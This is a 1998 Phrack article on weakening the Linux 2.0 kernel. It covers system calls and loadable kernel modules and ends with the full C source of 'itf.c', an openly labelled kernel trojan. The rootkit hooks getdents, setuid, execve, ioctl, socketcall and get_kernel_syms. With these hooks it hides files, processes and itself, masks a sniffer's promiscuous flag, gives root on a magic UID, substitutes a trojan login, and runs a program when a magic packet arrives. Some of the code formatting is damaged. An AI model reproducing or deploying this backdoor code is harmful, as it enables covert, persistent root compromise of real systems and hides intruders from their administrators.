Your Ad Here

---[ Phrack Magazine Volume 8, Issue 52 January 26, 1998, article 18 of 20

-------------------------[ Weakening the Linux Kernel

--------[ plaguez dube0866@eurobretagne.fr

----[ Preamble

The following applies to the Linux x86 2.0.x kernel series. It may also be accurate for previous releases, but has not been tested. 2.1.x kernels introduced a bunch of changes, most notably in the memory management routines, and are not discussed here.

Thanks to Halflife and Solar Designer for lots of neat ideas. Brought to you by plaguez and WSD.

----[ User space vs. Kernel space

Linux supports a number of architectures, however most of the code and discussion in this article refers to the i386 version only.

Memory is divided into two parts: kernel space and user space. Kernel space is defined in the GDT, and mapped to each processes address space. User space is in the LDT and is local to each process. A given program can't write to kernel memory even when it is mapped because it is not in the same ring.

You also can not access user memory from the kernel typically. However, this is really easy to overcome. When we execute a system call, one of the first things the kernel does is set ds and es up so that memory references point to the kernel data segment. It then sets up fs so that it points to the user data segment. If we want to use kernel memory in a system call, all we should have to do is push fs, then set it to ds. Of course, I have not actually tested this, so take it with a pound or two of salt :).

Here are a few of the useful functions to use in kernel mode for transferring data bytes to or from user memory:

include

get_user(ptr) Gets the given byte, word, or long from user memory. This is a macro, and it relies on the type of the argument to determine the number of bytes to transfer. You then have to use typecasts wisely.

putuser(ptr) This is the same as getuser(), but instead of reading, it writes data bytes to user memory.

memcpy_fromfs(void *to, const void *from,unsigned long n) Copies n bytes from *from in user memory to *to in kernel memory.

memcpy_tofs(void *to,const *from,unsigned long n) Copies n bytes from *from in kernel memory to *to in user memory.

----[ System calls

Most libc function calls rely on underlying system calls, which are the simplest kernel functions a user program can call. These system calls are implemented in the kernel itself or in loadable kernel modules, which are little chunks of dynamically linkable kernel code.

Like MS-DOS and many others, Linux system calls are implemented through a multiplexor called with a given maskable interrupt. In Linux, this interrupt is int 0x80. When the 'int 0x80' instruction is executed, control is given to the kernel (or, more accurately, to the function systemcall()), and the actual demultiplexing process occurs.

The systemcall() function works as follows:

First, all registers are saved and the content of the %eax register is checked against the global system calls table, which enumerates all system calls and their addresses. This table can be accessed with the extern void *syscalltable[] variable. A given number and memory address in this table corresponds to each system call. System call numbers can be found in /usr/include/sys/syscall.h. They are of the form SYSsystemcallname. If the system call is not implemented, the corresponding cell in the syscall_table is 0, and an error is returned. Otherwise, the system call exists and the corresponding entry in the table is the memory address of the system call code.

Here is an example of an invalid system call:

[root@plaguez kernel]# cat no1.c

include

include

include

extern void *syscalltable[];

sc() { // system call number 165 doesn't exist at this time. asm( "movl $165,%eax int $0x80"); }

main() { errno = -sc(); perror("test of invalid syscall"); } [root@plaguez kernel]# gcc no1.c [root@plaguez kernel]# ./a.out test of invalid syscall: Function not implemented [root@plaguez kernel]# exit

Normally, control is then transferred to the actual system call, which performs whatever you requested and returns. systemcall() then calls retfromsyscall() to check various stuff, and ultimately returns to user memory.

----[ libc wrappers

The int $0x80 isn't used directly for system calls; rather, libc functions, which are often wrappers to interrupt 0x80, are used.

libc is actually the user space interface to kernel functions.

libc generally features the system calls using the _syscallX() macros, where X is the number of parameters for the system call.

For example, the libc entry for write(2) would be implemented with a syscall3 macro, since the actual write(2) prototype requires 3 parameters. Before calling interrupt 0x80, the _syscallX macros are supposed to set up the stack frame and the argument list required for the system call. Finally, when the _systemcall() (which is triggered with int $0x80) returns, the _syscallX() macro will check for a negative return value (in %eax) and will set errno accordingly.

Let's check another example with write(2) and see how it gets preprocessed.

[root@plaguez kernel]# cat no2.c

include

include

include

include

include

include

include

include

include

syscall3(ssizet,write,int,fd,const void *,buf,size_t,count);

main() { char *t = "this is a test.\n"; write(0, t, strlen(t)); } [root@plaguez kernel]# gcc -E no2.c > no2.C [root@plaguez kernel]# indent no2.C -kr indent:no2.C:3304: Warning: old style assignment ambiguity in "=-". Assuming "= -"

[root@plaguez kernel]# tail -n 50 no2.C

9 "no2.c" 2

ssizet write(int fd, const void *buf, sizet count) { long res; _asm volatile("int $0x80":"=a"(res):"0"(4), "b"((long) (fd)), "c"((long) (buf)), "d"((long) (count))); if (res >= 0) return (ssizet) __res; errno = -res; return -1; };

main() { char *t = "this is a test.\n"; write(0, t, strlen(t)); } [root@plaguez kernel]# exit

Note that the '4' in the write() function above matches the SYS_write definition in /usr/include/sys/syscall.h.

----[ Writing your own system calls.

There are a few ways to create your own system calls. For example, you could modify the kernel sources and append your own code. A far easier way, however, would be to write a loadable kernel module.

A loadable kernel module is nothing more than an object file containing code that will be dynamically linked into the kernel when it is needed.

The main purposes of this feature are to have a small kernel, and to load a given driver when it is needed with the insmod(1) command. It's also easier to write a lkm than to write code in the kernel source tree.

With lkm, adding or modifying system calls is just a matter of modifying the syscalltable array, as we'll see in the example below.

----[ Writing a lkm

A lkm is easily written in C. It contains a chunk of #defines, the body of the code, an initialization function called initmodule(), and an unload function called cleanupmodule(). The initmodule() and cleanupmodule() functions will be called at module loading and deleting. Also, don't forget that modules are kernel code, and though they are easy to write, any programming mistake can have quite serious results.

Here is a typical lkm source structure:

define MODULE

define KERNEL

include

ifdef MODULE

include

include

else

define MODINCUSE_COUNT

define MODDECUSE_COUNT

endif

include

include

include

include

include

include

include

include

include

include

include

include

include

int errno;

char tmp[64];

/* for example, we may need to use ioctl */ _syscall3(int, ioctl, int, d, int, request, unsigned long, arg);

int myfunction(int parm1,char parm2) { int i,j,k; / ... */ }

int init_module(void) { /* ... */ printk("\nModule loaded.\n"); return 0; }

void cleanup_module(void) { /* ... */ printk("\nModule unloaded.\n"); }

Check the mandatory #defines (#define MODULE, #define KERNEL) and

includes (#include ...)

Also note that as our lkm will be running in kernel mode, we can't use libc functions, but we can use system calls with the previously discussed syscallX() macros or call them directly using the pointers to functions located in the syscall_table array.

You would compile this module with 'gcc -c -O3 module.c' and insert it into the kernel with 'insmod module.o' (optimization must be turned on).

As the title suggests, lkm can also be used to modify kernel code without having to rebuild it entirely. For example, you could patch the write(2) system call to hide portions of a given file. Seems like a good place for backdoors, also: what would you do if you couldn't trust your own kernel?

----[ Kernel and system calls backdoors

The main idea behind this is pretty simple. We'll redirect those damn system calls to our own system calls in a lkm, which will enable us to force the kernel to react as we want it to. For example, we could hide a sniffer by patching the IOCTL system call and masking the PROMISC bit. Lame but efficient.

To modify a given system call, just add the definition of the extern void *syscalltable[] in your lkm, and have the initmodule() function modify the corresponding entry in the syscall_table to point to your own code. The modified call can then do whatever you wish it to, meaning that as all user programs rely on those kernel calls, you'll have entire control of the system.

This point raises the fact that it can become very difficult to prevent intruders from staying in the system when they've broken into it. Prevention is still the best way to security, and hardening the Linux kernel is needed on sensitive boxes.

----[ A few programming tricks

define MODULE

define KERNEL

include

ifdef MODULE

include

include

else

define MODINCUSE_COUNT

define MODDECUSE_COUNT

endif

include

include

include

include

include

include

include

include

int errno;

/* pointer to the old setreuid system call / int (osetreuid) (uidt, uidt); /* the system calls vectors table */ extern void *syscall_table[];

int nsetreuid(uidt ruid, uidt euid) { printk("uid %i trying to seteuid to euid=%i", current->uid, euid); return (*osetreuid) (ruid, euid); }

int initmodule(void) { osetreuid = syscalltable[SYSsetreuid]; syscalltable[SYSsetreuid] = (void *) n_setreuid; printk("swatch loaded.\n"); return 0; }

void cleanupmodule(void) { syscalltable[SYSsetreuid] = o_setreuid; printk("\swatch unloaded.\n"); }

int init_module() { register struct module mp asm("%ebx"); // or whatever register it is in *(char)mp->name=0; mp->size=0; mp->ref=0; ... }

Since the kernel does not show modules with no name and no references (=kernel modules), our one won't be shown in /proc/modules.

----[ A practical example

Here is itf.c. The goal of this program is to demonstrate kernel backdooring techniques using system call redirection. Once installed, it is very hard to spot.

Its features include:

<++> lkm_trojan.c /* * itf.c v0.8 * Linux Integrated Trojan Facility * (c) plaguez 1997 -- dube0866@eurobretagne.fr * This is mostly not fully tested code. Use at your own risks. * * * compile with: * gcc -c -O3 -fomit-frame-pointer itf.c * Then: * insmod itf * * * Thanks to Halflife and Solar Designer for their help/ideas. * * Greets to: w00w00, GRP, #phrack, #innuendo, K2, YmanZ, Zemial. * * */

define MODULE

define KERNEL

include

include

include

include

include

include

include

include

include

include

include

include

include

include

include

include

include

include

include

include

include

include

include

include

/* Customization section * - RECVEXEC is the full pathname of the program to be launched when a packet * of size MAGICSIZE and containing the word MAGICNAME is received with recvfrom(). * This program can be a shell script, but must be able to handle null **argv (I'm too lazy * to write more than execve(RECVEXEC,NULL,NULL); :) * - NEWEXEC is the name of the program that is executed instead of OLDEXEC * when an execve() syscall occurs. * - MAGICUID is the numeric uid that will give you root when a call to setuid(MAGICUID) * is made (like Halflife's code) * - files containing MAGICNAME in their full pathname will be invisible to * a getdents() system call. * - processes containing MAGICNAME in their process name will be hidden of the * procfs tree. */

define MAGICNAME "w00w00T$!"

define MAGICUID 31337

define OLDEXEC "/bin/login"

define NEWEXEC "/.w00w00T$!/w00w00T$!login"

define RECVEXEC "/.w00w00T$!/w00w00T$!recv"

define MAGICSIZE sizeof(MAGICNAME)+10

/* old system calls vectors / int (ogetdents) (uint, struct dirent *, uint); ssizet(o_readdir) (int, void *, size_t); int (osetuid) (uidt); int (o_execve) (const char *, const char *[], const char *[]); int (oioctl) (int, int, unsigned long); int (*ogetkernelsyms) (struct kernelsym *); ssizet(o_read) (int, void *, size_t); int (osocketcall) (int, unsigned long *); /* entry points to brk() and fork() syscall. */ static inline _syscall1(int, brk, void *, enddata_segment); static inline _syscall0(int, fork); static inline _syscall1(void, exit, int, status);

extern void *syscalltable[]; extern struct proto tcp_prot; int errno;

char mtroj[] = MAGICNAME; int _NRmyexecve; int promisc;

/* * String-oriented functions * (from user-space to kernel-space or invert) */

char *strncpy_fromfs(char *dest, const char *src, int n) { char *tmp = src; int compt = 0;

do {
dest[compt++] = __get_user(tmp++, 1);
}
while ((dest[compt - 1] != '\0') && (compt != n));

return dest;

}

int myatoi(char *str) { int res = 0; int mul = 1; char *ptr;

for (ptr = str + strlen(str) - 1; ptr >= str; ptr--) {
if (*ptr < '0' || *ptr > '9')
    return (-1);
res += (*ptr - '0') * mul;
mul *= 10;
}
return (res);

}

/* * process hiding functions */ struct taskstruct *gettask(pidt pid) { struct taskstruct *p = current; do { if (p->pid == pid) return p; p = p->next_task; } while (p != current); return NULL;

}

/* the following function comes from fs/proc/array.c */ static inline char *taskname(struct taskstruct *p, char *buf) { int i; char *name;

name = p->comm;
i = sizeof(p->comm);
do {
unsigned char c = *name;
name++;
i--;
*buf = c;
if (!c)
    break;
if (c == '\\') {
    buf[1] = c;
    buf += 2;
    continue;
}
if (c == '\n') {
    buf[0] = '\\';
    buf[1] = 'n';
    buf += 2;
    continue;
}
buf++;
}
while (i);
*buf = '\n';
return buf + 1;

}

int invisible(pidt pid) { struct taskstruct *task = gettask(pid); char *buffer; if (task) { buffer = kmalloc(200, GFPKERNEL); memset(buffer, 0, 200); task_name(task, buffer); if (strstr(buffer, (char *) &mtroj)) { kfree(buffer); return 1; } } return 0; }

/* * New system calls */

/* * hide module symbols */ int ngetkernelsyms(struct kernelsym *table) { struct kernel_sym *tb; int compt, compt2, compt3, i, done;

compt = (*o_get_kernel_syms) (table);
if (table != NULL) {
tb = kmalloc(compt * sizeof(struct kernel_sym), GFP_KERNEL);
if (tb == 0) {
    return compt;
}
compt2 = 0;
done = 0;
i = 0;
memcpy_fromfs((void *) tb, (void *) table, compt * sizeof(struct kernel_sym));
while (!done) {
    if ((tb[compt2].name)[0] == '#')
    i = compt2;
    if (!strcmp(tb[compt2].name, mtroj)) {
    for (compt3 = i + 1; (tb[compt3].name)[0] != '#' && compt3 < compt; compt3++);
    if (compt3 != (compt - 1))
        memmove((void *) &(tb[i]), (void *) &(tb[compt3]), (compt - compt3) * sizeof(struct kernel_sym));
    else
        compt = i;
    done++;
    }
    compt2++;
    if (compt2 == compt)
    done++;

}

memcpy_tofs(table, tb, compt * sizeof(struct kernel_sym));
kfree(tb);
}
return compt;

}

/* * how it works: * I need to allocate user memory. To do that, I'll do exactly as malloc() does * it (changing the break value). */ int myexecve(const char *filename, const char *argv[], const char *envp[]) { long res; _asm volatile ("int $0x80":"=a" (res):"0"(NRmyexecve), "b"((long) (filename)), "c"((long) (argv)), "d"((long) (envp))); return (int) _res; }

int n_execve(const char *filename, const char *argv[], const char *envp[]) { char *test; int ret, tmp; char *truc = OLDEXEC; char *nouveau = NEWEXEC; unsigned long mmm;

test = (char *) kmalloc(strlen(truc) + 2, GFP_KERNEL);
(void) strncpy_fromfs(test, filename, strlen(truc));
test[strlen(truc)] = '\0';
if (!strcmp(test, truc)) {
kfree(test);
mmm = current->mm->brk;
ret = brk((void *) (mmm + 256));
if (ret < 0)
    return ret;
memcpy_tofs((void *) (mmm + 2), nouveau, strlen(nouveau) + 1);
ret = my_execve((char *) (mmm + 2), argv, envp);
tmp = brk((void *) mmm);
} else {
kfree(test);
ret = my_execve(filename, argv, envp);
}
return ret;

}

/* * Trap the ioctl() system call to hide PROMISC flag on ethernet interfaces. * If we reset the PROMISC flag when the trojan is already running, then it * won't hide it anymore (needed otherwise you'd just have to do an * "ifconfig eth0 +promisc" to find the trojan). */ int n_ioctl(int d, int request, unsigned long arg) { int tmp; struct ifreq ifr;

tmp = (*o_ioctl) (d, request, arg);
if (request == SIOCGIFFLAGS && !promisc) {
memcpy_fromfs((struct ifreq *) &ifr, (struct ifreq *) arg, sizeof(struct ifreq));
ifr.ifr_flags = ifr.ifr_flags & (~IFF_PROMISC);
memcpy_tofs((struct ifreq *) arg, (struct ifreq *) &ifr, sizeof(struct ifreq));
} else if (request == SIOCSIFFLAGS) {
memcpy_fromfs((struct ifreq *) &ifr, (struct ifreq *) arg, sizeof(struct ifreq));
if (ifr.ifr_flags & IFF_PROMISC)
    promisc = 1;
else if (!(ifr.ifr_flags & IFF_PROMISC))
    promisc = 0;
}
return tmp;

}

/* * trojan setMAGICUID() system call. */ int nsetuid(uidt uid) { int tmp;

if (uid == MAGICUID) {
current->uid = 0;
current->euid = 0;
current->gid = 0;
current->egid = 0;
return 0;
}
tmp = (*o_setuid) (uid);
return tmp;

}

/* * trojan getdents() system call. */ int n_getdents(unsigned int fd, struct dirent *dirp, unsigned int count) { unsigned int tmp, n; int t, proc = 0; struct inode *dinode; struct dirent *dirp2, *dirp3;

tmp = (*o_getdents) (fd, dirp, count);

ifdef _LINUXDCACHE_H

dinode = current->files->fd[fd]->f_dentry->d_inode;

else

dinode = current->files->fd[fd]->f_inode;

endif

if (dinode->i_ino == PROC_ROOT_INO && !MAJOR(dinode->i_dev) && MINOR(dinode->i_dev) == 1)
proc = 1;
if (tmp > 0) {
dirp2 = (struct dirent *) kmalloc(tmp, GFP_KERNEL);
memcpy_fromfs(dirp2, dirp, tmp);
dirp3 = dirp2;
t = tmp;
while (t > 0) {
    n = dirp3->d_reclen;
    t -= n;
    if ((strstr((char *) &(dirp3->d_name), (char *) &mtroj) != NULL) \
    ||(proc && invisible(myatoi(dirp3->d_name)))) {
    if (t != 0)
        memmove(dirp3, (char *) dirp3 + dirp3->d_reclen, t);
    else
        dirp3->d_off = 1024;
    tmp -= n;
    }
    if (dirp3->d_reclen == 0) {
    /*
     * workaround for some shitty fs drivers that do not properly
     * feature the getdents syscall.
     */
    tmp -= t;
    t = 0;
    }
    if (t != 0)
    dirp3 = (struct dirent *) ((char *) dirp3 + dirp3->d_reclen);


}
memcpy_tofs(dirp, dirp2, tmp);
kfree(dirp2);
}
return tmp;

}

/* * Trojan socketcall system call * executes a given binary when a packet containing the magic word is received. * WARNING: THIS IS REALLY UNTESTED UGLY CODE. MAY CORRUPT YOUR SYSTEM.
*/

int n_socketcall(int call, unsigned long *args) { int ret, ret2, compt; char *t = RECVEXEC; unsigned long *sargs = args; unsigned long a0, a1, mmm; void *buf;

ret = (*o_socketcall) (call, args);
if (ret == MAGICSIZE && call == SYS_RECVFROM) {
a0 = get_user(sargs);
a1 = get_user(sargs + 1);
buf = kmalloc(ret, GFP_KERNEL);
memcpy_fromfs(buf, (void *) a1, ret);
for (compt = 0; compt < ret; compt++)
    if (((char *) (buf))[compt] == 0)
    ((char *) (buf))[compt] = 1;
if (strstr(buf, mtroj)) {
    kfree(buf);
    ret2 = fork();
    if (ret2 == 0) {
    mmm = current->mm->brk;
    ret2 = brk((void *) (mmm + 256));
    memcpy_tofs((void *) mmm + 2, (void *) t, strlen(t) + 1);

/* Hope the execve has been successfull otherwise you'll have 2 copies of the master process in the ps list :] */ ret2 = my_execve((char *) mmm + 2, NULL, NULL); } } } return ret; }

/* * module initialization stuff. / int init_module(void) { / module list cleaning / / would need to make a clean search of the right register * in the function prologue, since gcc may not always put * struct module mp in %ebx * * Try %ebx, %edi, %ebp, well, every register actually :) */ register struct module *mp asm("%ebx"); *(char *) (mp->name) = 0; mp->size = 0; mp->ref = 0; / * Make it unremovable / / MODINCUSECOUNT; */ ogetkernelsyms = syscalltable[SYSgetkernelsyms]; syscalltable[SYSgetkernelsyms] = (void *) ngetkernel_syms;

o_getdents = sys_call_table[SYS_getdents];
sys_call_table[SYS_getdents] = (void *) n_getdents;

o_setuid = sys_call_table[SYS_setuid];
sys_call_table[SYS_setuid] = (void *) n_setuid;

__NR_myexecve = 164;
while (__NR_myexecve != 0 && sys_call_table[__NR_myexecve] != 0)
__NR_myexecve--;
o_execve = sys_call_table[SYS_execve];
if (__NR_myexecve != 0) {
sys_call_table[__NR_myexecve] = o_execve;
sys_call_table[SYS_execve] = (void *) n_execve;
}
promisc = 0;
o_ioctl = sys_call_table[SYS_ioctl];
sys_call_table[SYS_ioctl] = (void *) n_ioctl;

o_socketcall = sys_call_table[SYS_socketcall];
sys_call_table[SYS_socketcall] = (void *) n_socketcall;
return 0;

}

void cleanupmodule(void) { syscalltable[SYSgetkernelsyms] = ogetkernelsyms; syscalltable[SYSgetdents] = ogetdents; syscalltable[SYSsetuid] = osetuid; syscalltable[SYSsocketcall] = o_socketcall;

if (__NR_myexecve != 0)
sys_call_table[__NR_myexecve] = 0;
sys_call_table[SYS_execve] = o_execve;

sys_call_table[SYS_ioctl] = o_ioctl;

} <-->

----[ EOF